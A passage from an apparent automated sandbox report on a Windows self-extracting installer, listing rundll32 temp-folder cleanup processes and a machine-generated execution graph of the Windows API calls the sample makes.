                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff6dbfe0000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:11:38:22
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff6dbfe0000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:11:38:31
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff6dbfe0000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:28.6%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:28.1%
                                                                                                                                                                                                                                            Total number of Nodes:960
                                                                                                                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                                                                                                                            execution_graph 2196 8d4cc0 GlobalFree 2197 8d6f40 SetUnhandledExceptionFilter 3119 8d4bc0 3120 8d4c05 3119->3120 3122 8d4bd7 3119->3122 3121 8d4c1b SetFilePointer 3120->3121 3120->3122 3121->3122 3123 8d30c0 3124 8d30de CallWindowProcA 3123->3124 3125 8d30ce 3123->3125 3126 8d30da 3124->3126 3125->3124 3125->3126 3127 8d63c0 3128 8d6407 3127->3128 3129 8d658a CharPrevA 3128->3129 3130 8d6415 CreateFileA 3129->3130 3131 8d6448 WriteFile 3130->3131 3132 8d643a 3130->3132 3133 8d6465 CloseHandle 3131->3133 3135 8d6ce0 4 API calls 3132->3135 3133->3132 3136 8d648f 3135->3136 3137 8d3100 3138 8d3111 3137->3138 3139 8d31b0 3137->3139 3141 8d311d 3138->3141 3144 8d3149 GetDesktopWindow 3138->3144 3140 8d31b9 SendDlgItemMessageA 3139->3140 3143 8d3141 3139->3143 3140->3143 3142 8d3138 EndDialog 3141->3142 3141->3143 3142->3143 3147 8d43d0 6 API calls 3144->3147 3149 8d4463 SetWindowPos 3147->3149 3150 8d6ce0 4 API calls 3149->3150 3151 8d315d 6 API calls 3150->3151 3151->3143 3152 8d4200 3153 8d421e 3152->3153 3154 8d420b SendMessageA 3152->3154 3154->3153 3155 8d6c03 3156 8d6c1e 3155->3156 3157 8d6c17 _exit 3155->3157 3158 8d6c27 _cexit 3156->3158 3159 8d6c32 3156->3159 3157->3156 3158->3159 2198 8d4cd0 2199 8d4d0b 2198->2199 2200 8d4cf4 2198->2200 2201 8d4d02 2199->2201 2204 8d4dcb 2199->2204 2207 8d4d25 2199->2207 2200->2201 2202 8d4b60 FindCloseChangeNotification 2200->2202 2255 8d6ce0 2201->2255 2202->2201 2205 8d4dd4 SetDlgItemTextA 2204->2205 2208 8d4de3 2204->2208 2205->2208 2206 8d4e95 2207->2201 2221 8d4c37 2207->2221 2208->2201 2229 8d476d 2208->2229 2212 8d4e38 2212->2201 2238 8d4980 2212->2238 2217 8d4e64 2246 8d47e0 LocalAlloc 2217->2246 2220 8d4e6f 2220->2201 2222 8d4c88 2221->2222 2223 8d4c4c DosDateTimeToFileTime 2221->2223 2222->2201 2226 8d4b60 2222->2226 2223->2222 2224 8d4c5e LocalFileTimeToFileTime 2223->2224 2224->2222 2225 8d4c70 SetFileTime 2224->2225 2225->2222 2227 8d4b76 SetFileAttributesA 2226->2227 2228 8d4b92 FindCloseChangeNotification 2226->2228 2227->2201 2228->2227 2260 8d66ae GetFileAttributesA 2229->2260 2231 8d477b 2231->2212 2232 8d47cc SetFileAttributesA 2234 8d47db 2232->2234 2234->2212 2237 8d47c2 2237->2232 2239 8d4990 2238->2239 2240 8d49a5 2239->2240 2241 8d49c2 lstrcmpA 2239->2241 2243 8d44b9 20 API calls 2240->2243 2242 8d49ba 2241->2242 2244 8d4a0e 2241->2244 2242->2201 2242->2217 2243->2242 2244->2242 2326 8d487a 2244->2326 2247 8d480f LocalAlloc 2246->2247 2248 8d47f6 2246->2248 2251 8d4831 2247->2251 2254 8d480b 2247->2254 2249 8d44b9 20 API calls 2248->2249 2249->2254 2252 8d44b9 20 API calls 2251->2252 2253 8d4846 LocalFree 2252->2253 2253->2254 2254->2220 2256 8d6ce8 2255->2256 2257 8d6ceb 2255->2257 2256->2206 2339 8d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2257->2339 2259 8d6e26 2259->2206 2261 8d4777 2260->2261 2261->2231 2261->2232 2262 8d6517 FindResourceA 2261->2262 2263 8d656b 2262->2263 2264 8d6536 LoadResource 2262->2264 2269 8d44b9 2263->2269 2264->2263 2266 8d6544 DialogBoxIndirectParamA FreeResource 2264->2266 2266->2263 2267 8d47b1 2266->2267 2267->2232 2267->2234 2267->2237 2270 8d44fe LoadStringA 2269->2270 2271 8d455a 2269->2271 2272 8d4527 2270->2272 2273 8d4562 2270->2273 2275 8d6ce0 4 API calls 2271->2275 2274 8d681f 10 API calls 2272->2274 2279 8d45c9 2273->2279 2286 8d457e 2273->2286 2276 8d452c 2274->2276 2277 8d4689 2275->2277 2278 8d4536 MessageBoxA 2276->2278 2310 8d67c9 2276->2310 2277->2267 2278->2271 2281 8d45cd LocalAlloc 2279->2281 2282 8d4607 LocalAlloc 2279->2282 2281->2271 2287 8d45f3 2281->2287 2282->2271 2284 8d45c4 2282->2284 2288 8d462d MessageBeep 2284->2288 2286->2286 2289 8d4596 LocalAlloc 2286->2289 2291 8d171e _vsnprintf 2287->2291 2298 8d681f 2288->2298 2289->2271 2290 8d45af 2289->2290 2316 8d171e 2290->2316 2291->2284 2295 8d67c9 EnumResourceLanguagesA 2297 8d4645 MessageBoxA LocalFree 2295->2297 2297->2271 2299 8d6857 GetVersionExA 2298->2299 2300 8d6940 2298->2300 2302 8d687c 2299->2302 2303 8d691a 2299->2303 2301 8d6ce0 4 API calls 2300->2301 2304 8d463b 2301->2304 2302->2303 2305 8d68a5 GetSystemMetrics 2302->2305 2303->2300 2304->2295 2304->2297 2305->2303 2306 8d68b5 RegOpenKeyExA 2305->2306 2306->2303 2307 8d68d6 RegQueryValueExA RegCloseKey 2306->2307 2307->2303 2308 8d690c 2307->2308 2320 8d66f9 2308->2320 2311 8d6803 2310->2311 2312 8d67e2 2310->2312 2311->2278 2324 8d6793 EnumResourceLanguagesA 2312->2324 2314 8d67f5 2314->2311 2325 8d6793 EnumResourceLanguagesA 2314->2325 2317 8d172d 2316->2317 2318 8d173d _vsnprintf 2317->2318 2319 8d175d 2317->2319 2318->2319 2319->2284 2321 8d670f 2320->2321 2322 8d6740 CharNextA 2321->2322 2323 8d674b 2321->2323 2322->2321 2323->2303 2324->2314 2325->2311 2327 8d48a2 CreateFileA 2326->2327 2329 8d48e9 2327->2329 2330 8d4908 2327->2330 2329->2330 2331 8d48ee 2329->2331 2330->2242 2334 8d490c 2331->2334 2335 8d48f5 CreateFileA 2334->2335 2336 8d4917 2334->2336 2335->2330 2336->2335 2337 8d4962 CharNextA 2336->2337 2338 8d4953 CreateDirectoryA 2336->2338 2337->2336 2338->2337 2339->2259 2340 8d4ad0 2348 8d3680 2340->2348 2343 8d4aee WriteFile 2345 8d4b0f 2343->2345 2346 8d4b14 2343->2346 2344 8d4ae9 2346->2345 2347 8d4b3b SendDlgItemMessageA 2346->2347 2347->2345 2349 8d3691 MsgWaitForMultipleObjects 2348->2349 2350 8d36a9 PeekMessageA 2349->2350 2351 8d36e8 2349->2351 2350->2349 2352 8d36bc 2350->2352 2351->2343 2351->2344 2352->2349 2352->2351 2353 8d36c7 DispatchMessageA 2352->2353 2354 8d36d1 PeekMessageA 2352->2354 2353->2354 2354->2352 3160 8d3210 3161 8d3227 3160->3161 3185 8d328e EndDialog 3160->3185 3162 8d3235 3161->3162 3163 8d33e2 GetDesktopWindow 3161->3163 3165 8d3239 3162->3165 3168 8d32dd GetDlgItemTextA 3162->3168 3169 8d324c 3162->3169 3166 8d43d0 11 API calls 3163->3166 3167 8d33f1 SetWindowTextA SendDlgItemMessageA 3166->3167 3167->3165 3170 8d341f GetDlgItem EnableWindow 3167->3170 3174 8d3366 3168->3174 3179 8d32fc 3168->3179 3171 8d32c5 EndDialog 3169->3171 3172 8d3251 3169->3172 3170->3165 3171->3165 3172->3165 3173 8d325c LoadStringA 3172->3173 3175 8d327b 3173->3175 3176 8d3294 3173->3176 3177 8d44b9 20 API calls 3174->3177 3181 8d44b9 20 API calls 3175->3181 3198 8d4224 LoadLibraryA 3176->3198 3177->3165 3179->3174 3180 8d3331 GetFileAttributesA 3179->3180 3183 8d337c 3180->3183 3184 8d333f 3180->3184 3181->3185 3187 8d658a CharPrevA 3183->3187 3188 8d44b9 20 API calls 3184->3188 3185->3165 3186 8d32a5 SetDlgItemTextA 3186->3165 3186->3175 3189 8d338d 3187->3189 3190 8d3351 3188->3190 3191 8d58c8 27 API calls 3189->3191 3190->3165 3192 8d335a CreateDirectoryA 3190->3192 3193 8d3394 3191->3193 3192->3174 3192->3183 3193->3174 3194 8d33a4 3193->3194 3195 8d33c7 EndDialog 3194->3195 3196 8d597d 34 API calls 3194->3196 3195->3165 3197 8d33c3 3196->3197 3197->3165 3197->3195 3199 8d4246 GetProcAddress 3198->3199 3200 8d43b2 3198->3200 3201 8d425d GetProcAddress 3199->3201 3202 8d43a4 FreeLibrary 3199->3202 3204 8d44b9 20 API calls 3200->3204 3201->3202 3203 8d4274 GetProcAddress 3201->3203 3202->3200 3203->3202 3205 8d428b 3203->3205 3206 8d329d 3204->3206 3207 8d4295 GetTempPathA 3205->3207 3212 8d42e1 3205->3212 3206->3165 3206->3186 3208 8d42ad 3207->3208 3208->3208 3209 8d42b4 CharPrevA 3208->3209 3210 8d42d0 CharPrevA 3209->3210 3209->3212 3210->3212 3211 8d4390 FreeLibrary 3211->3206 3212->3211 3213 8d4a50 3214 8d4a9f ReadFile 3213->3214 3215 8d4a66 3213->3215 3216 8d4abb 3214->3216 3215->3216 3217 8d4a82 memcpy 3215->3217 3217->3216 3218 8d3450 3219 8d345e 3218->3219 3220 8d34d3 EndDialog 3218->3220 3222 8d349a GetDesktopWindow 3219->3222 3223 8d3465 3219->3223 3221 8d346a 3220->3221 3224 8d43d0 11 API calls 3222->3224 3223->3221 3226 8d348c EndDialog 3223->3226 3225 8d34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3224->3225 3225->3221 3226->3221 3227 8d6bef _XcptFilter 2355 8d4ca0 GlobalAlloc 2356 8d6a60 2373 8d7155 2356->2373 2358 8d6a65 2359 8d6a76 GetStartupInfoW 2358->2359 2360 8d6a93 2359->2360 2361 8d6aa8 2360->2361 2362 8d6aaf Sleep 2360->2362 2363 8d6ac7 _amsg_exit 2361->2363 2365 8d6ad1 2361->2365 2362->2360 2363->2365 2364 8d6b13 _initterm 2369 8d6b2e __IsNonwritableInCurrentImage 2364->2369 2365->2364 2366 8d6af4 2365->2366 2365->2369 2367 8d6bd6 _ismbblead 2367->2369 2368 8d6c1e 2368->2366 2370 8d6c27 _cexit 2368->2370 2369->2367 2369->2368 2372 8d6bbe exit 2369->2372 2378 8d2bfb GetVersion 2369->2378 2370->2366 2372->2369 2374 8d717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 8d717a 2373->2375 2377 8d71cd 2374->2377 2375->2374 2376 8d71e2 2375->2376 2376->2358 2377->2376 2379 8d2c0f 2378->2379 2380 8d2c50 2378->2380 2379->2380 2382 8d2c13 GetModuleHandleW 2379->2382 2395 8d2caa memset memset memset 2380->2395 2382->2380 2384 8d2c22 GetProcAddress 2382->2384 2384->2380 2390 8d2c34 2384->2390 2385 8d2c8e 2387 8d2c9e 2385->2387 2388 8d2c97 CloseHandle 2385->2388 2387->2369 2388->2387 2390->2380 2393 8d2c89 2489 8d1f90 2393->2489 2506 8d468f FindResourceA SizeofResource 2395->2506 2398 8d2ef3 2401 8d44b9 20 API calls 2398->2401 2399 8d2d2d CreateEventA SetEvent 2400 8d468f 7 API calls 2399->2400 2403 8d2d57 2400->2403 2402 8d2d6e 2401->2402 2405 8d6ce0 4 API calls 2402->2405 2404 8d2d5b 2403->2404 2406 8d2e1f 2403->2406 2410 8d468f 7 API calls 2403->2410 2407 8d44b9 20 API calls 2404->2407 2409 8d2c62 2405->2409 2511 8d5c9e 2406->2511 2407->2402 2409->2385 2436 8d2f1d 2409->2436 2412 8d2d9f 2410->2412 2412->2404 2415 8d2da3 CreateMutexA 2412->2415 2413 8d2e3a 2416 8d2e43 2413->2416 2417 8d2e52 FindResourceA 2413->2417 2414 8d2e30 2414->2398 2415->2406 2418 8d2dbd GetLastError 2415->2418 2537 8d2390 2416->2537 2421 8d2e6e 2417->2421 2422 8d2e64 LoadResource 2417->2422 2418->2406 2420 8d2dca 2418->2420 2423 8d2dea 2420->2423 2424 8d2dd5 2420->2424 2435 8d2e4d 2421->2435 2552 8d36ee GetVersionExA 2421->2552 2422->2421 2426 8d44b9 20 API calls 2423->2426 2425 8d44b9 20 API calls 2424->2425 2427 8d2de8 2425->2427 2428 8d2dff 2426->2428 2430 8d2e04 CloseHandle 2427->2430 2428->2406 2428->2430 2430->2402 2434 8d6517 24 API calls 2434->2435 2435->2402 2437 8d2f6c 2436->2437 2438 8d2f3f 2436->2438 2660 8d5164 2437->2660 2440 8d2f5f 2438->2440 2641 8d51e5 2438->2641 2788 8d3a3f 2440->2788 2441 8d2f71 2472 8d303c 2441->2472 2673 8d55a0 2441->2673 2448 8d6ce0 4 API calls 2450 8d2c6b 2448->2450 2449 8d2f86 GetSystemDirectoryA 2451 8d658a CharPrevA 2449->2451 2476 8d52b6 2450->2476 2452 8d2fab LoadLibraryA 2451->2452 2453 8d2ff7 FreeLibrary 2452->2453 2454 8d2fc0 GetProcAddress 2452->2454 2455 8d3017 SetCurrentDirectoryA 2453->2455 2456 8d3006 2453->2456 2454->2453 2457 8d2fd6 DecryptFileA 2454->2457 2458 8d3054 2455->2458 2459 8d3026 2455->2459 2456->2455 2721 8d621e GetWindowsDirectoryA 2456->2721 2457->2453 2467 8d2ff0 2457->2467 2463 8d3061 2458->2463 2731 8d3b26 2458->2731 2461 8d44b9 20 API calls 2459->2461 2466 8d3037 2461->2466 2469 8d307a 2463->2469 2463->2472 2740 8d256d 2463->2740 2807 8d6285 GetLastError 2466->2807 2467->2453 2470 8d3098 2469->2470 2751 8d3ba2 2469->2751 2470->2472 2474 8d30af 2470->2474 2472->2448 2809 8d4169 2474->2809 2477 8d52d6 2476->2477 2486 8d5316 2476->2486 2480 8d5300 LocalFree LocalFree 2477->2480 2482 8d52eb SetFileAttributesA DeleteFileA 2477->2482 2478 8d5374 2479 8d538c 2478->2479 3115 8d1fe1 2478->3115 2481 8d6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2483 8d2c72 2481->2483 2482->2480 2483->2385 2483->2393 2485 8d535e SetCurrentDirectoryA 2488 8d2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 8d65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 8d1f9a 2489->2490 2494 8d1f9f 2489->2494 2491 8d1ea7 15 API calls 2490->2491 2491->2494 2492 8d1fcf ExitWindowsEx 2496 8d1fd9 2492->2496 2493 8d1ee2 GetCurrentProcess OpenProcessToken 2499 8d1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2493->2499 2501 8d1f0e 2493->2501 2495 8d44b9 20 API calls 2494->2495 2494->2496 2498 8d1fc0 2494->2498 2495->2498 2496->2385 2498->2492 2498->2493 2498->2496 2500 8d1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 8d1f1f 2500->2502 2503 8d44b9 20 API calls 2501->2503 2504 8d6ce0 4 API calls 2502->2504 2503->2502 2505 8d1f8c 2504->2505 2505->2385 2507 8d2d1a 2506->2507 2508 8d46b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 8d46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 8d46df memcpy_s FreeResource 2509->2510 2510->2507 2517 8d5e17 2511->2517 2535 8d5cc3 2511->2535 2512 8d5dd0 2516 8d5dec GetModuleFileNameA 2512->2516 2512->2517 2513 8d6ce0 4 API calls 2515 8d2e2c 2513->2515 2514 8d5ced CharNextA 2514->2535 2515->2413 2515->2414 2516->2517 2518 8d5e0a 2516->2518 2517->2513 2587 8d66c8 2518->2587 2520 8d6218 2596 8d6e2a 2520->2596 2523 8d5e36 CharUpperA 2524 8d61d0 2523->2524 2523->2535 2525 8d44b9 20 API calls 2524->2525 2526 8d61e7 2525->2526 2527 8d61f7 ExitProcess 2526->2527 2528 8d61f0 CloseHandle 2526->2528 2528->2527 2529 8d5f9f CharUpperA 2529->2535 2530 8d6003 CharUpperA 2530->2535 2531 8d5f59 CompareStringA 2531->2535 2532 8d5edc CharUpperA 2532->2535 2533 8d60a2 CharUpperA 2533->2535 2534 8d667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2517 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 8d658a 2535->2592 2538 8d24cb 2537->2538 2541 8d23b9 2537->2541 2539 8d6ce0 4 API calls 2538->2539 2540 8d24dc 2539->2540 2540->2435 2541->2538 2542 8d23e9 FindFirstFileA 2541->2542 2542->2538 2543 8d2407 2542->2543 2544 8d2479 2543->2544 2545 8d2421 lstrcmpA 2543->2545 2546 8d24a9 FindNextFileA 2543->2546 2550 8d658a CharPrevA 2543->2550 2551 8d2390 5 API calls 2543->2551 2548 8d2488 SetFileAttributesA DeleteFileA 2544->2548 2545->2546 2547 8d2431 lstrcmpA 2545->2547 2546->2543 2549 8d24bd FindClose RemoveDirectoryA 2546->2549 2547->2543 2547->2546 2548->2546 2549->2538 2550->2543 2551->2543 2553 8d372d 2552->2553 2555 8d3737 2552->2555 2554 8d44b9 20 API calls 2553->2554 2566 8d39fc 2553->2566 2554->2566 2555->2553 2559 8d38a4 2555->2559 2555->2566 2603 8d28e8 2555->2603 2556 8d6ce0 4 API calls 2557 8d2e92 2556->2557 2557->2402 2557->2435 2567 8d18a3 2557->2567 2559->2553 2560 8d39c1 MessageBeep 2559->2560 2559->2566 2561 8d681f 10 API calls 2560->2561 2562 8d39ce 2561->2562 2563 8d39d8 MessageBoxA 2562->2563 2564 8d67c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2556 2568 8d18d5 2567->2568 2573 8d19b8 2567->2573 2632 8d17ee LoadLibraryA 2568->2632 2570 8d6ce0 4 API calls 2572 8d19d5 2570->2572 2572->2434 2572->2435 2573->2570 2574 8d18e5 GetCurrentProcess OpenProcessToken 2574->2573 2575 8d1900 GetTokenInformation 2574->2575 2576 8d1918 GetLastError 2575->2576 2577 8d19aa CloseHandle 2575->2577 2576->2577 2578 8d1927 LocalAlloc 2576->2578 2577->2573 2579 8d19a9 2578->2579 2580 8d1938 GetTokenInformation 2578->2580 2579->2577 2581 8d194e AllocateAndInitializeSid 2580->2581 2582 8d19a2 LocalFree 2580->2582 2581->2582 2584 8d196e 2581->2584 2582->2579 2583 8d1999 FreeSid 2583->2582 2584->2583 2585 8d1975 EqualSid 2584->2585 2586 8d198c 2584->2586 2585->2584 2585->2586 2586->2583 2588 8d66d5 2587->2588 2589 8d66f3 2588->2589 2591 8d66e5 CharNextA 2588->2591 2599 8d6648 2588->2599 2589->2517 2591->2588 2593 8d659b 2592->2593 2593->2593 2594 8d65b8 CharPrevA 2593->2594 2595 8d65ab 2593->2595 2594->2595 2595->2535 2602 8d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 8d621d 2600 8d665d IsDBCSLeadByte 2599->2600 2601 8d6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 8d2a62 2603->2604 2611 8d290d 2603->2611 2605 8d2a6e GlobalFree 2604->2605 2606 8d2a75 2604->2606 2605->2606 2606->2559 2608 8d2955 GlobalAlloc 2608->2604 2609 8d2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 8d2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 8d2a80 GlobalUnlock 2611->2612 2613 8d2773 2611->2613 2612->2604 2614 8d27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 8d28b2 2613->2615 2616 8d27db 2614->2616 2617 8d28b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 8d28a8 GetWindowsDirectoryA 2616->2618 2620 8d27e3 2616->2620 2619 8d28bf 2617->2619 2618->2619 2621 8d28d2 2619->2621 2622 8d658a CharPrevA 2619->2622 2624 8d658a CharPrevA 2620->2624 2623 8d6ce0 4 API calls 2621->2623 2622->2621 2625 8d28e2 2623->2625 2626 8d2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 8d2837 RegQueryValueExA 2626->2627 2628 8d285c 2627->2628 2629 8d289a RegCloseKey 2627->2629 2630 8d2867 ExpandEnvironmentStringsA 2628->2630 2631 8d287a 2628->2631 2629->2619 2630->2631 2631->2629 2633 8d1826 GetProcAddress 2632->2633 2634 8d1890 2632->2634 2636 8d1889 FreeLibrary 2633->2636 2637 8d1839 AllocateAndInitializeSid 2633->2637 2635 8d6ce0 4 API calls 2634->2635 2638 8d189f 2635->2638 2636->2634 2637->2636 2639 8d185f FreeSid 2637->2639 2638->2573 2638->2574 2639->2636 2642 8d468f 7 API calls 2641->2642 2643 8d51f9 LocalAlloc 2642->2643 2644 8d522d 2643->2644 2645 8d520d 2643->2645 2647 8d468f 7 API calls 2644->2647 2646 8d44b9 20 API calls 2645->2646 2648 8d521e 2646->2648 2649 8d523a 2647->2649 2650 8d6285 GetLastError 2648->2650 2651 8d523e 2649->2651 2652 8d5262 lstrcmpA 2649->2652 2657 8d2f4d 2650->2657 2655 8d44b9 20 API calls 2651->2655 2653 8d527e 2652->2653 2654 8d5272 LocalFree 2652->2654 2658 8d44b9 20 API calls 2653->2658 2654->2657 2656 8d524f LocalFree 2655->2656 2656->2657 2657->2437 2657->2440 2657->2472 2659 8d5290 LocalFree 2658->2659 2659->2657 2661 8d468f 7 API calls 2660->2661 2662 8d5175 2661->2662 2663 8d517a 2662->2663 2664 8d51af 2662->2664 2665 8d44b9 20 API calls 2663->2665 2666 8d468f 7 API calls 2664->2666 2668 8d518d 2665->2668 2667 8d51c0 2666->2667 2822 8d6298 2667->2822 2668->2441 2671 8d51e1 2671->2441 2672 8d44b9 20 API calls 2672->2668 2674 8d468f 7 API calls 2673->2674 2675 8d55c7 LocalAlloc 2674->2675 2676 8d55fd 2675->2676 2677 8d55db 2675->2677 2679 8d468f 7 API calls 2676->2679 2678 8d44b9 20 API calls 2677->2678 2680 8d55ec 2678->2680 2681 8d560a 2679->2681 2682 8d6285 GetLastError 2680->2682 2683 8d560e 2681->2683 2684 8d5632 lstrcmpA 2681->2684 2709 8d55f1 2682->2709 2687 8d44b9 20 API calls 2683->2687 2685 8d564b LocalFree 2684->2685 2686 8d5645 2684->2686 2688 8d5696 2685->2688 2690 8d565b 2685->2690 2686->2685 2689 8d561f LocalFree 2687->2689 2691 8d589f 2688->2691 2694 8d56ae GetTempPathA 2688->2694 2689->2709 2695 8d5467 49 API calls 2690->2695 2692 8d6517 24 API calls 2691->2692 2692->2709 2693 8d6ce0 4 API calls 2696 8d2f7e 2693->2696 2697 8d56eb 2694->2697 2698 8d56c3 2694->2698 2700 8d5678 2695->2700 2696->2449 2696->2472 2703 8d586c GetWindowsDirectoryA 2697->2703 2704 8d5717 GetDriveTypeA 2697->2704 2697->2709 2834 8d5467 2698->2834 2702 8d44b9 20 API calls 2700->2702 2700->2709 2702->2709 2868 8d597d GetCurrentDirectoryA SetCurrentDirectoryA 2703->2868 2707 8d5730 GetFileAttributesA 2704->2707 2719 8d572b 2704->2719 2707->2719 2709->2693 2710 8d597d 34 API calls 2710->2719 2711 8d5467 49 API calls 2711->2697 2712 8d2630 21 API calls 2712->2719 2714 8d57c1 GetWindowsDirectoryA 2714->2719 2715 8d658a CharPrevA 2716 8d57e8 GetFileAttributesA 2715->2716 2717 8d57fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 8d5827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2707 2719->2709 2719->2710 2719->2712 2719->2714 2719->2715 2719->2718 2720 8d5467 49 API calls 2719->2720 2864 8d6952 2719->2864 2720->2719 2722 8d6249 2721->2722 2723 8d6268 2721->2723 2724 8d44b9 20 API calls 2722->2724 2725 8d597d 34 API calls 2723->2725 2726 8d625a 2724->2726 2727 8d625f 2725->2727 2728 8d6285 GetLastError 2726->2728 2729 8d6ce0 4 API calls 2727->2729 2728->2727 2730 8d3013 2729->2730 2730->2455 2730->2472 2732 8d3b2d 2731->2732 2733 8d3b72 2732->2733 2734 8d3b53 2732->2734 2934 8d4fe0 2733->2934 2736 8d6517 24 API calls 2734->2736 2737 8d3b70 2736->2737 2738 8d6298 10 API calls 2737->2738 2739 8d3b7b 2737->2739 2738->2739 2739->2463 2741 8d2583 2740->2741 2742 8d2622 2740->2742 2743 8d25e8 RegOpenKeyExA 2741->2743 2744 8d258b 2741->2744 2961 8d24e0 GetWindowsDirectoryA 2742->2961 2746 8d2609 RegQueryInfoKeyA 2743->2746 2747 8d25e3 2743->2747 2744->2747 2748 8d259b RegOpenKeyExA 2744->2748 2749 8d25d1 RegCloseKey 2746->2749 2747->2469 2748->2747 2750 8d25bc RegQueryValueExA 2748->2750 2749->2747 2750->2749 2752 8d3bec 2751->2752 2753 8d3bdb 2751->2753 2755 8d3c03 memset 2752->2755 2756 8d3d13 2752->2756 2759 8d3d26 2752->2759 2762 8d3d7b CompareStringA 2752->2762 2763 8d3fd7 2752->2763 2766 8d3fab 2752->2766 2768 8d468f 7 API calls 2752->2768 2769 8d3f1e LocalFree 2752->2769 2770 8d3f46 LocalFree 2752->2770 2774 8d3cc7 CompareStringA 2752->2774 2785 8d3e10 2752->2785 2969 8d1ae8 2752->2969 3010 8d202a memset memset RegCreateKeyExA 2752->3010 3036 8d3fef 2752->3036 2754 8d468f 7 API calls 2753->2754 2754->2752 2755->2752 2757 8d44b9 20 API calls 2756->2757 2757->2759 2760 8d6ce0 4 API calls 2759->2760 2761 8d3f60 2760->2761 2761->2470 2762->2752 2762->2763 2763->2759 3060 8d2267 2763->3060 2767 8d44b9 20 API calls 2766->2767 2772 8d3fbe LocalFree 2767->2772 2768->2752 2769->2752 2769->2763 2770->2759 2772->2759 2774->2752 2775 8d3e1f GetProcAddress 2777 8d3f64 2775->2777 2775->2785 2776 8d3f92 2778 8d44b9 20 API calls 2776->2778 2779 8d44b9 20 API calls 2777->2779 2780 8d3fa9 2778->2780 2781 8d3f75 FreeLibrary 2779->2781 2782 8d3f7c LocalFree 2780->2782 2781->2782 2783 8d6285 GetLastError 2782->2783 2784 8d3f8b 2783->2784 2784->2759 2785->2775 2785->2776 2786 8d3eff FreeLibrary 2785->2786 2787 8d3f40 FreeLibrary 2785->2787 3050 8d6495 2785->3050 2786->2769 2787->2770 2789 8d468f 7 API calls 2788->2789 2790 8d3a55 LocalAlloc 2789->2790 2791 8d3a6c 2790->2791 2792 8d3a8e 2790->2792 2793 8d44b9 20 API calls 2791->2793 2794 8d468f 7 API calls 2792->2794 2795 8d3a7d 2793->2795 2796 8d3a98 2794->2796 2797 8d6285 GetLastError 2795->2797 2798 8d3a9c 2796->2798 2799 8d3ac5 lstrcmpA 2796->2799 2800 8d2f64 2797->2800 2801 8d44b9 20 API calls 2798->2801 2802 8d3b0d LocalFree 2799->2802 2803 8d3ada 2799->2803 2800->2437 2800->2472 2804 8d3aad LocalFree 2801->2804 2802->2800 2805 8d6517 24 API calls 2803->2805 2804->2800 2806 8d3aec LocalFree 2805->2806 2806->2800 2808 8d628f 2807->2808 2808->2472 2810 